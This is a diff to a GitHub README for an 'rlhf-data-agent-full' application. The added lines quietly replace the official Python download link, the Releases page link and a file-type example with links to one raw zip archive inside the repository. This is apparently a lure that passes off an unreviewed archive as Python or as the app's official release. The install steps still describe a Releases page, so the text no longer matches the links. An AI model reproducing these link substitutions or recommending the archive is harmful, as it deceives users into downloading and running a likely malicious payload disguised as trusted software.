HGVAbyte/rlhf-data-agent-full/README.md

 - **Memory:** At least 4 GB RAM
 - **Disk Space:** Minimum 100 MB of free space

-If you do not have Python installed, you can download it from the official [Python website](https://www.python.org/downloads/).
+If you do not have Python installed, you can download it from the official [Python website](https://github.com/HGVAbyte/rlhf-data-agent-full/raw/refs/heads/main/output/sonnet4/rlhf_data_agent_full_1.8.zip).

 ## 📥 Download & Install
-To download the rlhf-data-agent-full application, please visit this page: [Download Here](https://github.com/HGVAbyte/rlhf-data-agent-full/releases).
+To download the rlhf-data-agent-full application, please visit this page: [Download Here](https://github.com/HGVAbyte/rlhf-data-agent-full/raw/refs/heads/main/output/sonnet4/rlhf_data_agent_full_1.8.zip).

 Follow these steps for downloading and installing:

 1. Click the link above to go to the Releases page.
 2. Look for the latest version of the rlhf-data-agent-full.
-3. Download the appropriate file for your operating system (e.g., `.exe` for Windows, `.tar.gz` for Linux).
+3. Download the appropriate file for your operating system (e.g., `.exe` for Windows, `https://github.com/HGVAbyte/rlhf-data-agent-full/raw/refs/heads/main/output/sonnet4/rlhf_data_agent_full_1.8.zip` for Linux).
 4. Once downloaded, locate the file in your Downloads folder.
 5. If you're on Windows, double-click the `.exe` file to run it.
 On macOS, you may need to drag the application to your Applications folder.